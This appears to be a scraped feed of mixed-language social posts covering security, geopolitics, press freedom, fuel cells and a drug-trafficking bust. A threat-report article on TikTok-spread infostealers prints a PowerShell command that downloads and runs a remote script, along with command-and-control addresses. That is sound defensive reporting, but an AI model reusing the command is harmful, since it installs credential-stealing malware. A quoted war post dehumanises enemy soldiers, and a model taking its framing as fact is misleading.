Malware nascosto in oltre 100 popolari estensioni per Chrome: come proteggersi
@Informatica (Italy e non Italy 😁)
È stata svelata una campagna malware altamente sofisticata che coinvolge oltre 100 estensioni per Google Chrome: apparentemente offrono funzionalità legittime, come strumenti di produttività o assistenti AI, ma celano un secondo volto molto più
Informatica (Italy e non Italy 😁) reshared this.
Active Directory: cos’è e come mitigare Authentication Server Response Roasting
@Informatica (Italy e non Italy 😁)
L’Authentication Server Response Roasting è una delle 17 tecniche di hacking abitualmente adottate da chi si occupa di penetration testing infrastrutturale (cyber gang comprese) al fine di compromettere un tipico dominio Active Directory. Ecco
Informatica (Italy e non Italy 😁) reshared this.
Sicurezza nazionale e IA, il Pentagono aumenta il budget destinato a Palantir
@Notizie dall'Italia e dal mondo
Il Dipartimento della Difesa statunitense ha annunciato l’intenzione di aumentare nuovamente il limite di spesa di 795 milioni di dollari (rispetto a un tetto di 480 milioni di dollari solo un anno fa) per le licenze software nell’ambito del Maven Smart System di
Notizie dall'Italia e dal mondo reshared this.
ACN: ad aprile crescita sostenuta di attacchi DDoS e ransomware
@Informatica (Italy e non Italy 😁)
Aumenti rilevanti degli attacchi DDoS e ransomware sono al centro del report mensile dell’ACN. Ecco cosa emerge dal consueto report dell'Agenzia cyber del mese di aprile 2025
L'articolo ACN: ad aprile crescita sostenuta di attacchi DDoS e ransomware proviene da Cyber
Informatica (Italy e non Italy 😁) reshared this.
#USA-#Sudafrica, favole e #genocidio
USA-Sudafrica, favole e genocidio
L’imboscata tesa da Trump al presidente sudafricano, Cyril Ramaphosa, durante l’incontro con la stampa di mercoledì nello Studio Ovale, ha fatto presa soltanto sugli ambienti di estrema destra (“MAGA”) che formano la base di consenso della Casa Bianc…www.altrenotizie.org
""Questa società è uno sciame di locuste. Il loro scopo è avanzare a qualunque costo, conquistando nuovi territori. Ogni giorno a Vovchansk, si fanno avanti in piccoli gruppi di 3-5 persone, scavalcando i cadaveri di coloro che, ore prima, hanno preso d'assalto la stessa posizione. Senza senso, senza ragione, senza successo: solo per ammucchiare cadaveri presso di noi.
Ciò differisce dagli assalti-tritacarne del maresciallo sovietico Zhukov per il solo fatto che ora attaccano in gruppi più piccoli, non per conquistare chilometri, ma una singola posizione di pochi metri quadrati. Giorno dopo giorno, metodicamente, ondata dopo ondata, se perdono terreno, si ritirano, se qualcuno è rimasto per ritirarsi.
Ma con una persistenza folle. L'individuo si dissolve, diventando parte dello sciame, dove la morte di pochi non viene nemmeno registrata. Non riesco a spiegare perché continuino ad arrivare, pur sapendo che li uccideremo.
La mia formazione filosofica mi impedisce di vedere questa routine con gli occhi di un matematico, limitandomi a notare: meno uno, meno cinque, meno quaranta. La mia formazione filosofica e teologica mi spinge a dare un senso al perché questo Homo erectus condizionato ("uomo eretto", perché non posso definirlo biologicamente Homo sapiens, non scorgendo alcuna razionalità nelle sue azioni) si arrampichi sui cadaveri del suo sciame verso una morte certa, tra rovine che ricordano un paesaggio marziano. Per cosa? Qual è la motivazione? Cosa sperano di ottenere?
Quando ho parlato con i prigionieri di guerra, hanno tutti detto di volere soldi dal regime di Putin per migliorare la propria situazione finanziaria. Nessuno ha menzionato motivazioni ideologiche, fede in valori superiori o un obiettivo ambizioso. Solo prestiti, debiti, mutui, povertà, la necessità di crescere i figli.
Sei venuto a uccidere i nostri figli per crescere i tuoi?
Silenzio. Occhi bassi.
Ma questa è la realtà. Ucciderebbero tranquillamente noi e i nostri bambini, ci rubano le case, dormono nei nostri letti, indossano persino i nostri vestiti. Non lo considerano ripugnante o sbagliato. Le loro autorità hanno dato loro il permesso, quindi va bene. Senza esitazione, indosseranno il tuo vestito e mangeranno dal tuo piatto perché il loro zar e la loro chiesa lo hanno benedetto.
Vengono per prendere e divorare le nostre risorse, per popolare la nostra terra con se stessi. Mentre i leader dello sciame cercano di spiegare perché ci attaccano e ci uccidono, i ranghi inferiori vogliono solo arricchirsi assassinando e saccheggiando.""
Personenkontrollen, Victim Blaming: Studie warnt vor Diskriminierung durch Polizei
Now KDE Users Will Get Easy Virtual Machine Management, Too
If you work with virtual machines, perhaps to spin up a clean OS install for testing, historically you have either bitten the bullet and used one of the commercial options, or spent time getting your hands dirty with something open source. Over recent years that has changed, with the arrival of open source graphical applications for effortless VM usage. We’ve used GNOME Boxes here to make our lives a lot easier. Now KDE are also joining the party with Karton, a project which will deliver what looks very similar to Boxes in the KDE desktop.
The news comes in a post from Derek Lin, and shows us what work has already been done as well as a roadmap for future work. At the moment it’s in no way production ready and it only works with QEMU, but it can generate new VMs, run them, and capture their screens to a desktop window. Having no wish to join in any Linux desktop holy wars we look forward to seeing this piece of software progress, as it’s a Google Summer Of Code project we hope there will be plenty more to see shortly.
Still using the commercial option? You can move to open source too!
Golden Dome, lo scudo spaziale Usa costerà oltre 500 miliardi. Tutti i dettagli
@Notizie dall'Italia e dal mondo
Donald Trump ha annunciato ufficialmente l’avvio operativo del programma Golden Dome, il nuovo sistema di difesa missilistico progettato per blindare il territorio statunitense da minacce avanzate, ipersoniche e orbitali. Con un investimento iniziale da 25
Notizie dall'Italia e dal mondo reshared this.
Cannabis light. Arrestato segretario Radicali per disobbedienza
"Questo pomeriggio il nostro segretario Filippo Blengino, è stato arrestato e condotto in Questura dopo essersi autodenunciato per aver aperto un negozio di cannabis light nella nostra sede. Il decreto Sicurezza ha infatti equiparato la cannabis light, sostanza senza effetti psicotropi, che fino a poche settimane fa si vendeva in diversi negozi e tabacchini, alla cannabis con THC. L'obiettivo della disobbedienza civile del nostro segretario, che ora rischia fino a vent'anni di carcere, è quello di smantellare questa norma liberticida innanzi alla Corte costituzionale. Non ci fermeremo di fronte a norme che stanno lentamente rendendo il nostro Paese una democratura, continuando a mettere a disposizione il nostro corpo e la fedina penale per difendere lo Stato di Diritto". Così Radicali Italiani in una nota ufficiale .
(agenzia Dire)
Recent leaks reinforce why journalist-source confidentiality needs protecting
When the Trump administration quickly fulfilled our Freedom of Information Act request for a memo belying its own rationales both for mass deporting Venezuelans and for cracking down on leaks to the press, we had plenty of theories about why.
Maybe someone in the FOIA office used our request as an opportunity to blow the whistle. Maybe it was some kind of mistake. But one possibility that never occurred to us was that administration higher-ups somehow thought that the memo made them look good. After all, everyone knows President Donald Trump hires only the “best and most serious people.”
But according to a report in The New York Times, that’s exactly what happened. So who was the poor junior staffer who somehow read a short, straightforward memo wherein intelligence agencies said Venezuela’s government does not control the Tren de Aragua gang, as Trump claims, and took it to mean, well, the complete opposite? The intelligence community had better stop hiring from whatever school gave that kid a degree!
Turns out it wasn’t some kid, though. It was Joe Kent, chief of staff to Director of National Intelligence Tulsi Gabbard. And get this: He’s Trump’s nominee to lead the National Counterterrorism Center. Apparently, after a first memo undermined Trump’s narrative that Venezuelan migrants are actually President Nicolás Maduro’s secret foot soldiers, Kent requested some “rewriting … so this document is not used against the DNI or POTUS.”
The memo released to us was apparently the rewrite — which confirmed the conclusions of the initial memo. It did mention that the FBI believed some Venezuelan government officials might communicate with some members of Tren de Aragua, but no serious legal minds believe that constitutes an invasion that justifies Trump’s invoking of the Alien Enemies Act.
Kent, however, somehow read it (or maybe that’s giving him too much credit) and thought it vindicated the administration. No one else read it that way, including Secretary of State (among other jobs) Marco Rubio. Rubio didn’t even attempt to twist the memo into somehow supporting the administration’s policies — he just said the intelligence community got it wrong.
But the reason Freedom of the Press Foundation (FPF) filed the FOIA in the first place was not to prove whether Maduro has gangbangers on speed dial or whether high-ranking intelligence officials lack intelligence. It was to check whether Attorney General Pam Bondi’s basis for repealing her predecessor’s safeguards against subpoenaing journalists held water.
Bondi, as well as Gabbard, claimed reports from The New York Times and The Washington Post were false when stating that intelligence agencies disbelieved Trump’s claims about Tren de Aragua. The administration, these officials said, needed the ability to investigate the source of the leak, including by subpoenaing journalists, to protect the nation from so-called fake news from the so-called deep state.
The memo, as we’ve written before, confirmed that the Times and Post got it right and the only thing a crackdown on leaks was meant to protect was Trump and his cronies from embarrassment. But the memo has turned into more than that — it’s become Exhibit A on why leaks to the press serve the public interest.
Here’s a non-exhaustive list of news we now know about because of the leaks to the Times and Post, the memo we were able to request as a result of those leaks, and the reporting that followed.
- Kent, the nominee to lead the National Counterterrorism Center, can’t comprehend basic intelligence reports.
- Kent demanded intelligence agencies rewrite their findings to save his bosses from embarrassment and, according to the Times, there are emails to prove it (we have filed requests for those, too).
- There is a major rift between the State Department and the intelligence community about one of the Trump administration’s most significant policies.
- Gabbard requested Bondi initiate a leak investigation based on lies.
- Bondi repealed protections for reporters and their sources based on the same lies.
- The United States mass deported people to a dangerous prison in El Salvador to perform slave labor for a Trump-friendly authoritarian — all based on the same lies.
Virtually every time the government has cracked down on leaks claiming some kind of threat to the homeland, the real threat has been to its own reputation. Usually it takes years to confirm the obvious. It took decades for Nixon officials who once argued that releasing the Pentagon Papers would gravely endanger national security to admit that was nonsense all along. But this time we know the truth almost immediately, thanks to leaks.
Bondi was right about one thing — the leaks undermined the administration’s policies. But she left out that they were policies that needed undermining because they were built on lies — the kinds of lies that the drafters of the Constitution intended journalists to expose when they wrote the First Amendment’s press clause. That’s what the Times, Post, and their sources did, and it’s exactly why journalist-source confidentiality needs protecting.
A Brief History of Fuel Cells
If we asked you to think of a device that converts a chemical reaction into electricity, you’d probably say we were thinking of a battery. That’s true, but there is another device that does this that is both very similar and very different from a battery: the fuel cell.
In a very simple way, you can think of a fuel cell as a battery that consumes the chemicals it uses and allows you to replace those chemicals so that, as long as you have fuel, you can have electricity. However, the truth is a little more complicated than that. Batteries are energy storage devices. They run out when the energy stored in the chemicals runs out. In fact, many batteries can take electricity and reverse the chemical reaction, in effect recharging them. Fuel cells react chemicals to produce electricity. No fuel, no electricity.
Superficially, the two devices seem very similar. Like batteries, fuel cells have an anode and a cathode. They also have an electrolyte, but its purpose isn’t the same as in a conventional battery. Typically, a catalyst causes fuel to oxidize, creating positively charged ions and electrons. These ions move from the anode to the cathode, and the electrons move from the anode, through an external circuit, and then to the cathode, so electric current occurs. As a byproduct, many fuel cells produce potentially useful byproducts like water. NASA has the animation below that shows how one type of cell works.
youtube.com/embed/V3ChCroWttY?…
History
Sir William Grove seems to have made the first fuel cell in 1838, publishing in The London and Edinburgh Philosophical Magazine and Journal of Science. His fuel cell used dilute acid, copper sulphate, along with sheet metal and porcelain. Today, the phosphoric acid fuel cell is similar to Grove’s design.
The Bacon fuel cell is due to Francis Thomas Bacon and uses alkaline fuel. Modern versions of this are in use today by NASA and others. Although Bacon’s fuel cell could produce 5 kW, it was General Electric in 1955 that started creating larger units. GE chemists developed an ion exchange membrane that included a platinum catalyst. Named after the developers, the “Grubb-Niedrach” fuel cell flew in Gemini space capsules. By 1959, a fuel cell tractor prototype was running, as well as a welding machine powered by a Bacon cell.
One of the reasons spacecraft often use fuel cells is that many cells take hydrogen and oxygen as fuel and put out electricity and water. There are already gas tanks available, and you can always use water.
Types of Fuel Cells
Not all fuel cells use the same fuel or produce the same byproducts. At the anode, a catalyst ionizes the fuel, which produces a positive ion and a free electron. The electrolyte, often a membrane, can pass ions, but not the electrons. That way, the ions move towards the cathode, but the electrons have to find another way — through the load — to get to the cathode. When they meet again, a reaction with more fuel and a catalyst produces the byproduct: hydrogen and oxygen form water.
Most common cells use hydrogen and oxygen with an anode catalyst of platinum and a cathode catalyst of nickel. The voltage output per cell is often less than a volt. However, some fuel cells use hydrocarbons. Diesel, methanol, and other hydrocarbons can produce electricity and carbon dioxide as a byproduct, along with water. You can even use some unusual organic inputs, although to be fair, those are microbial fuel cells.
Common types include:
- Alkaline – The Bacon cell was a fixture in space capsules, using carbon electrodes, a catalyst, and a hydroxide electrolyte.
- Solid acid – These use a solid acid material as electrolyte. The material is heated to increase conductivity.
- Phosphoric acid – Another acid-based technology that operates at hotter temperatures.
- Molten carbonate – These work at high temperatures using lithium potassium carbonate as an electrolyte.
- Solid oxide – Another high temperature that uses zirconia ceramic as the electrolyte.
In addition to technology, you can consider some fuel cells as stationary — typically producing a lot of power for consumption by some power grid — or mobile.
Using fuel cells in stationary applications is attractive partly because they have no moving parts. However, you need a way to fuel it and — if you want efficiency — you need a way to harness the waste heat produced. It is possible, for example, to use solar power to turn water into gas and then use that gas to feed a fuel cell. It is possible to use the heat directly or to convert it to electricity in a more conventional way.
Space
Fuel cells have a long history in space. You can see how alkaline Bacon cells were used in early fuel cells in the video below.
youtube.com/embed/OouXKyroV4w?…Apollo (left) and Shuttle (right) fuel cells (from a NASA briefing)
Very early fuel cells — starting with Gemini in 1962 — used a proton exchange membrane. However, in 1967, NASA started using Nafion from DuPont, which was improved over the old membranes.
However, alkaline cells had vastly improved power density, and from Apollo on, these cells, using a potassium hydroxide electrolyte, were standard issue.
Even the Shuttle had fuel cells. Russian spacecraft also had fuel cells, starting with a liquid oxygen-hydrogen cell used on the Soviet Lunar Orbital Spacecraft (LOK).
The shuttle’s power plant measured 14 x 15 x 45 inches and weighed 260 pounds. They were installed under the payload bay, just aft of the crew compartment. They drew cryogenic gases from nearby tanks and could provide 12 kW continuously, and up to 16 kW. However, they typically were taxed at about 50% capacity. Each orbiter’s power plant contained 96 individual cells connected to achieve a 28-volt output.
Going Mobile
There have been attempts to make fuel cell cars, but with the difficulty of delivering, storing, and transporting hydrogen, there has been resistance. The Toyota Mirai, for example, costs $57,000, yet owners sued because they couldn’t obtain hydrogen. Some buses use fuel cells, and a small number of trains (including the one mentioned in the video below).
youtube.com/embed/0d0h42IZlWU?…
Surprisingly, there is a market for forklifts using fuel cells. The clean output makes them ideal for indoor operation. Batteries? They take longer to charge and don’t work well in the cold. Fuel cells don’t mind the cold, and you can top them off in three minutes.
There have been attempts to put fuel cells into any vehicle you can imagine. Airplanes, motorcycles, and boats sporting fuel cells have all made the rounds.
Can You DIY?
We have seen a few fuel cell projects, but they all seem to vanish over time. In theory, it shouldn’t be that hard, unless you demand commercial efficiency. However, it can be done, as you can see in the video below. If you make a fuel cell, be sure to send us a tip so we can spread the word.
youtube.com/embed/NE6dxzDeWbI?…
Featured image: “SEM micrograph of an MEA cross section” by [Xi Yin]
Tutte le mosse dell’Italia nell’Indo-Pacifico, tra naval diplomacy e accordi industriali
@Notizie dall'Italia e dal mondo
Durante la Langkawi International Maritime and Aerospace Exhibition (Lima), Fincantieri ed Enra energy solutions hanno firmato un accordo di collaborazione tecnica in favore del programma strategico “15 to 5” per il rafforzamento delle capacità navali operative
Notizie dall'Italia e dal mondo reshared this.
Gaza. Entrati un po’ di aiuti umanitari: “una goccia nell’oceano dei bisogni”.
@Notizie dall'Italia e dal mondo
Intanto proseguono i raid israeliani. Oggi 45 palestinesi uccisi da bombe e cannonate
L'articolo Gaza. Entrati un po’ di aiuti umanitari:pagineesteri.it/2025/05/22/med…
Notizie dall'Italia e dal mondo reshared this.
Difesa europea, il nodo politico che frena l’integrazione. L’analisi di Caruso
@Notizie dall'Italia e dal mondo
Nel contesto di crescente instabilità geopolitica, l’Unione europea sta accelerando il processo di rafforzamento della propria architettura di difesa collettiva. Lo scorso 15 maggio, durante la riunione del Comitato militare dell’Ue (Eumc) a livello di capi di Stato
Notizie dall'Italia e dal mondo reshared this.
June PPI Meetings
Ahoy Pirates,
Our next PPI board meeting will take place on 03.06.2025 at 14:00 UTC / 16:00 CEST.
Prior to that meeting we will hold a SCENE and SCUBA working groups meeting in the same Jitsi room a week later, 10.06.2025 at 19:00 UTC / 21:00 CEST.
All official PPI proceedings, Board meetings included, are open to the public. Feel free to stop by. We’ll be happy to have you.
Where:jitsi.pirati.cz/PPI-BoardAgenda: etherpad.pp-international.net/…
All of our meetings are posted to our calendar: pp-international.net/calendar/
We look forward to seeing visitors.
Thank you for your support,
The Board of PPI
Un nuovo modello di lavoro: la tavola rotonda del Parlamento Europeo in collaborazione con TPI
@Politica interna, europea e internazionale
Venerdì 23 maggio, alle ore 11,30, presso Esperienza Europa – David Sassoli il Parlamento Europeo, in collaborazione con The Post Internazionale (TPI), organizza la tavola rotonda “Un nuovo modello di lavoro: la direttiva UE per stage di qualità“. Un
Politica interna, europea e internazionale reshared this.
Hai seguito un bel tutorial su TikTok e non sei stato attento? Bravo, ti sei beccato un malware!
In un preoccupante segnale dell’evoluzione delle tattiche cybercriminali, i threat actor stanno ora sfruttando la popolarità di TikTok come canale per la distribuzione di malware avanzati progettati per il furto di informazioni. L’ultima campagna in circolazione si concentra sulla diffusione degli infostealer Vidar e StealC, inducendo gli utenti a eseguire comandi PowerShell dannosi con il pretesto di attivare software legittimi o sbloccare funzionalità premium in applicazioni come Windows OS, Microsoft Office, CapCut e Spotify.
A differenza dei metodi tradizionali — come i siti web compromessi o le email di phishing — questo vettore d’attacco si basa esclusivamente su tecniche di ingegneria sociale veicolate tramite video. I criminali informatici realizzano video anonimi, spesso generati con strumenti di intelligenza artificiale, che guidano passo dopo passo le vittime nell’installazione inconsapevole del malware sui propri dispositivi.
Questo approccio è particolarmente insidioso perché non lascia alcun codice dannoso sulla piattaforma stessa che le soluzioni di sicurezza possano rilevare e tutti i contenuti fruibili vengono forniti in modo visivo e uditivo. I ricercatori di Trend Micro hanno identificato diversi account TikTok coinvolti in questa campagna, tra cui @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc e @digitaldreams771.
La loro indagine ha rivelato che alcuni video hanno ottenuto un notevole successo: uno in particolare ha ottenuto oltre 20.000 “Mi piace”, 100 commenti e ha raggiunto circa 500.000 visualizzazioni. Questa ampia diffusione dimostra il potenziale impatto della campagna e sottolinea come la portata algoritmica di TikTok possa amplificare contenuti dannosi.
Le conseguenze per le vittime sono gravi, poiché questi ladri di informazioni possono sottrarre dati sensibili, rubare credenziali e potenzialmente compromettere i sistemi aziendali. Una volta installato, il malware stabilisce una comunicazione con i server di comando e controllo, consentendo agli aggressori di raccogliere informazioni preziose dai dispositivi compromessi.
Meccanismo di infezione e analisi tecnica
La catena di infezione inizia quando gli utenti seguono le istruzioni video per aprire PowerShell (premendo Windows+R e digitando “powershell”) e quindi eseguono un comando simile a: iex (irm https://allaivo[.]me/spotify). Questo comando dall’aspetto innocuo scarica ed esegue uno script remoto (SHA256: b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886) che avvia il processo di infezione.
Una volta eseguito, lo script crea delle directory nascoste nelle cartelle APPDATA e LOCALAPPDATA dell’utente, quindi aggiunge questi percorsi all’elenco di esclusione di Windows Defender: una sofisticata tecnica di elusione che aiuta il malware a evitare il rilevamento. Il malware procede quindi a scaricare ulteriori payload, tra cui i ladri di informazioni Vidar e StealC.
Queste varianti di malware sono particolarmente pericolose perché prendono di mira informazioni sensibili, tra cui password salvate, portafogli di criptovalute e cookie di autenticazione. Dopo l’installazione, il malware si connette a vari server di comando e controllo, tra cui servizi legittimi utilizzati in modo improprio.
Vidar, ad esempio, utilizza i profili Steam (hxxps://steamcommunity[.]com/profiles/76561199846773220) e i canali Telegram (hxxps://t[.]me/v00rd) come “Dead Drop Resolver” per nascondere la sua effettiva infrastruttura C&C, una tecnica che rende il tracciamento e l’interruzione più difficili. Ciò che rende questa campagna particolarmente efficace è il modo in cui fonde l’ingegneria sociale con lo sfruttamento tecnico.
Presentandosi come utili tutorial per accedere alle funzionalità premium dei software più diffusi, i video creano fiducia negli spettatori, che poi eseguono volentieri i comandi che compromettono i loro sistemi. Ciò rappresenta un’evoluzione significativa negli attacchi basati sui social media, dimostrando come gli autori delle minacce continuino ad adattare le proprie tattiche per sfruttare il comportamento degli utenti ed eludere i controlli di sicurezza tradizionali.
L'articolo Hai seguito un bel tutorial su TikTok e non sei stato attento? Bravo, ti sei beccato un malware! proviene da il blog della sicurezza informatica.
Poliverso & Poliversity reshared this.
Sulle spallucce degli altri.
Una parte dell'Italia di oggi si regge sulle spallucce di chi non ha a cuore diritti e giustizia.
oggi su RadioTre Fahrenheit: dialogo sul numero de "La scuola delle cose" dedicato alle scritture di ricerca, sperimentali, complesse
oggi, alle 17:30, Rai RadioTre Fahrenheit: dialogo su "La scuola delle cose" (Lyceum/Mudima) n. 19 - SCRITTURA DI RICERCA
slowforward.net/2025/05/22/22m…
Poliversity - Università ricerca e giornalismo reshared this.
Trashed Sound System Lives to Rock another Day
Plenty of consumer goods, from passenger vehicles to toys to electronics, get tossed out prematurely for all kinds of reasons. Repairable damage, market trends, planned obsolescence, and bad design can all lead to an early sunset on something that might still have some useful life in it. This was certainly the case for a sound system that [Bill] found — despite a set of good speakers, the poor design of the hardware combined with some damage was enough for the owner to toss it. But [Bill] took up the challenge to get it back in working order again.Inside the DIY control unit.
The main problem with this unit is that of design. It relies on a remote control to turn it on and operate everything, and if that breaks or is lost, the entire unit won’t even power on. Tracing the remote back to the control board reveals a 15-pin connector, and some other audio sleuths online have a few ways of using this port to control the system without the remote.
[Bill] found a few mistakes that needed to be corrected, and was eventually able to get an ESP8266 (and eventually an ESP32) to control the unit thanks largely to the fact that it communicates using a slightly modified I2C protocol.
There were a few pieces of physical damage to correct, too. First, the AC power cable had been cut off which was simple enough to replace, but [Bill] also found that a power connector inside the unit was loose as well. With that taken care of he has a perfectly functional and remarkably inexpensive sound system ready for movies or music. There are some other options available for getting a set of speakers blasting tunes again as well, like building the amplifier for them from scratch from the get-go.
USA: Guai ai paesi che usano i chip di Huawei! Ma sotto pressione della Cina cambiano idea
Solo poche settimane dopo che Stati Uniti e Cina hanno tentato di allentare le tensioni commerciali, i rapporti tra i due paesi si sono nuovamente inaspriti, questa volta a causa dei semiconduttori.
Il Ministero del Commercio cinese ha minacciato di intraprendere azioni legali contro qualsiasi azienda o Paese che rispetti le restrizioni sulle esportazioni di chip AI di Huawei. Lo ha riportato Bloomberg .
Il motivo sono le nuove direttive emanate dall’amministrazione Donald Trump il 13 maggio, che hanno ricordato che l’utilizzo dei chip AI Huawei Ascend “in qualsiasi parte del mondo” è considerato una violazione delle normative statunitensi sull’esportazione.
Le linee guida giungono mentre gli Stati Uniti stanno abrogando le normative sull’intelligenza artificiale introdotte sotto la presidenza di Joe Biden.
All’inizio della settimana, la Cina ha affermato che le azioni degli Stati Uniti stavano compromettendo gli accordi raggiunti nei colloqui di Ginevra volti a stabilizzare le relazioni. Pechino ha visto le nuove direttive come un gesto politico che viola lo spirito della riconciliazione raggiunta e ha accusato gli Stati Uniti di ostacolare i progressi nei colloqui.
A seguito delle critiche provenienti dalla Cina, il Dipartimento del Commercio degli Stati Uniti ha modificato la formulazione del documento, rimuovendo la parte più restrittiva, ovvero il riferimento a “ovunque nel mondo”, ha riportato Bloomberg.
Il rischio, ricorda Pechino, è che “questa pratica di utilizzare il protezionismo unilaterale per contenere e isolare altri paesi finirà per minare la competitività dell’industria statunitense, e il risultato non può che essere quello di darsi la zappa sui piedi”.
L'articolo USA: Guai ai paesi che usano i chip di Huawei! Ma sotto pressione della Cina cambiano idea proviene da il blog della sicurezza informatica.
OpenAI con io Products minaccia Apple?
L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
OpenAI acquisterà io Products, la startup dell'ex super designer di Apple Jony Ive. Sam Altman assicura che il loro primo prodotto non farà sparire lo smartphone eppure c'è chi vede questa nuova avventura come "un cattivo presagio" per il produttore di
reshared this
STUPEFACENTI DALL'ALBANIA ALL'ITALIA. Tra le fonti di prova le chat criptate della piattaforma SKYECC
Le autorità in Italia e in Albania hanno inferto un duro colpo a tre gruppi di criminalità organizzata legati nel traffico di droga su larga scala e nel riciclaggio di denaro. Durante una giornata di azione congiunta, i mandati di arresto sono stati emessi contro 52 sospetti, compresi gli individui che si ritiene siano ai massimi livelli nelle gerarchie dei gruppi. Eurojust ha sostenuto la cooperazione tra le autorità italiane e albanesi creando un team di indagine congiunto (JIT/SIC Squadra Investigativa Comune). Durante il giorno dell'azione, le autorità di entrambi i paesi hanno sequestrato attività per un valore di almeno diversi milioni di euro, Compresi appartamenti e aziende, nonché vari veicoli di lusso. Sono state anche sequestrate grandi quantità di denaro e quantità di cocaina ed eroina.
Le reti criminali erano coinvolte nei pagamenti, spesso in contanti, di quasi 5 milioni di euro e il traffico di almeno 1 800 chili di cocaina ed eroina.
La Direzione Investigativa Antimafia di Bari e le Autorità Albanesi, con l’ausilio di Interpol, dell’Ufficio dell’Esperto per la Sicurezza di Tirana e della Polizia Albanese, nell’ambito di una Squadra Investigativa Comune, hanno eseguito, su disposizione della Direzione Distrettuale Antimafia di Bari e la Procura Speciale Anticorruzione e Criminalità Organizzata di Tirana, con il Coordinamento di Eurojust (L’Aja) e della Direzione Nazionale Antimafia ed Antiterrorismo di Roma, due ordinanze di custodia cautelare, emesse dal Giudice per le Indagini Preliminari di Bari e dal Giudice presso il Tribunale Speciale di Primo Grado Anticorruzione e Criminalità Organizzata di Tirana nei confronti, complessivamente, di 52 persone responsabili a vario titolo, di traffico internazionale di ingenti quantitativi di sostanze stupefacenti, riciclaggio e abuso d’ufficio.
I provvedimenti cautelari, emessi nell’ambito dell’Operazione URA a fronte delle indagini effettuate dalla DIA di Bari tra settembre 2021 e giugno 2022, hanno consentito di raccogliere gravi indizi di colpevolezza a carico degli indagati, albanesi ed italiani, appartenenti in Italia a due associazioni criminali – riconosciute tali dal G.I.P. di Bari – stanziate nello stesso capoluogo pugliese (accertamento compiuto nella fase delle indagini preliminari che necessita della successiva verifica processuale nel contraddittorio con la difesa) nonché, in Albania, facenti parte di un potente gruppo criminale organizzato – riconosciuto tale dal Giudice di Tirana – stanziato a Durazzo.
La DIA, relativamente agli ingenti quantitativi di eroina e cocaina movimentati, a decorrere dal 2016, tra i Balcani, il Nord Europa, il Sud America e la Puglia, ha documentato l’esistenza di una comunanza d’interessi tra il gruppo criminale in Albania, deputato – a livello transnazionale – alla commercializzazione ed al trasferimento dello stupefacente, e le due associazioni criminali operanti a Bari le quali, a loro volta, effettuate le operazioni di “taglio” e confezionamento in panetti, rifornivano all’ingrosso le organizzazioni baresi, brindisine e leccesi interessate a ricevere l’eroina e la cocaina – di qualità – proveniente rispettivamente dalla Turchia e dall’America Latina.
Le complesse indagini, effettuate con intercettazioni telefoniche, ambientali, video-riprese e servizi di osservazione, pedinamento e controllo, avvalorate dall’estrapolazione e dall’analisi delle chat criptate acquisite dalla piattaforma SKYECC, nonché dalle dichiarazioni di tre collaboratori di giustizia (di cui ne è stata accertata la credibilità e l’attendibilità), hanno permesso, tra l’altro, di documentare, in relazione alla sostanza stupefacente inviata a Bari principalmente dall’Albania e dal Nord Europa, innumerevoli rifornimenti (255 chili di eroina “pura” e cocaina “pura”) effettuati tramite corrieri internazionali. Nel medesimo contesto è stato ricostruito un “flusso” ininterrotto di denaro contante dalla Puglia all’Albania, a pagamento dello stupefacente commercializzato all’“ingrosso”, avvenuto tramite autisti di autobus di linea internazionali, le cui illegali transazioni, per un importo complessivo di 4,5 milioni di euro, hanno consentito alle Autorità Albanesi di contestare il reato di riciclaggio.
In tale ambito sono stati inoltre ricostruite: diverse consegne di denaro contante a pagamento della droga, avvenute a Bari, per importi superiori anche a mezzo milione di euro; il trasferimento di oltre 500 mila dollari dall’Albania all’America Latina, versati quale anticipo per l’acquisto di una partita di 500 chili di cocaina spedita da Guayaquil (Ecuador); episodi di abuso d’ufficio verificatisi in territorio albanese.
I riscontri utilizzati per dimostrare l’operatività delle tre associazioni criminali transnazionali hanno riguardato un precedente sequestro di 3 milioni di euro in denaro contante a Durazzo (Albania) nonché i sequestri di stupefacente effettuati, in circostanze diverse: di oltre 30 chili di eroina ed alcuni “laboratori artigianali” adibiti, a Bari e provincia, al taglio e confezionamento della droga in panetti; di 2 tonnellate di cocaina al porto di Rotterdam (Olanda); di 932 chili di cocaina al porto di Gioia Tauro (Reggio Calabria); di 400 chili di Hashish a Noicattaro (Bari).
Novità di questa indagine è rappresentata dall’utilizzo, tra le fonti di prova, delle chat criptate della piattaforma SKYECC, acquisite con Ordini Europei d’Indagine presso il Tribunale di Parigi. I messaggi, una volta decodificati dagli investigatori della Dia di Bari e condivisi con gli Ufficiali della S.P.A.K. di Tirana, sono stati minuziosamente analizzati e incrociati con le altre risultanze d’indagine, consentendo le contestazioni di reato sia alla D.D.A. di Bari che all’Autorità Giudiziaria albanese.
Il G.I.P. del Tribunale di Bari, dott. Francesco Vittorio Rinaldi, accogliendo le risultanze investigative della locale DDA, (allo stato, fatta salva la valutazione nelle fasi successive con il contributo della difesa) ha riconosciuto il “salto di qualità”, soprattutto dal punto di vista dell’utilizzo di strumenti tecnologici all’avanguardia, il “know-how” e la “capacità imprenditoriale” dei narcotrafficanti albanesi, capaci di gestire vere e proprie “holding criminali” ed in grado di rifornire gruppi mafiosi egemoni nella città di Bari.
I provvedimenti restrittivi emessi dal Giudice presso il Tribunale di Tirana hanno riguardato, tra gli altri, i vertici di una potente famiglia egemone nella città di Durazzo, un Comandante e un Agente della Polizia albanese, un Avvocato e 6 autisti di autobus di linea internazionale.
Le misure cautelari patrimoniali, (allo stato, salvo ulteriore verifica successiva nella fase decisoria con il contraddittorio con la difesa), hanno riguardato in Italia il sequestro preventivo funzionale alla confisca di beni mobili ed immobili tra i quali 9 appartamenti, 4 Società, 7 conti correnti e 3 autovetture e, in Albania, il sequestro di diversi immobili, 2 Società di costruzioni, 4 ristoranti di lusso, 1 Agenzia Immobiliare, 1 rete Televisiva, il cui valore complessivo è stimato in diversi milioni di euro.
L’esecuzione dell’operazione internazionale è stata resa possibile grazie alla Squadra Investigativa Comune, strumento di cooperazione giudiziaria istituito tra la D.D.A. di Bari, la S.P.A.K. di Tirana ed Eurojust (Organismo che sostiene la cooperazione giudiziaria nella lotta contro le forme gravi di criminalità transnazionale), che ha consentito al personale della DIA di Bari ed alle Autorità Albanesi di effettuare approfondimenti investigativi congiunti, avvalendosi del fondamentale ruolo di coordinamento assicurato dalla Direzione Nazionale Antimafia e Antiterrorismo.
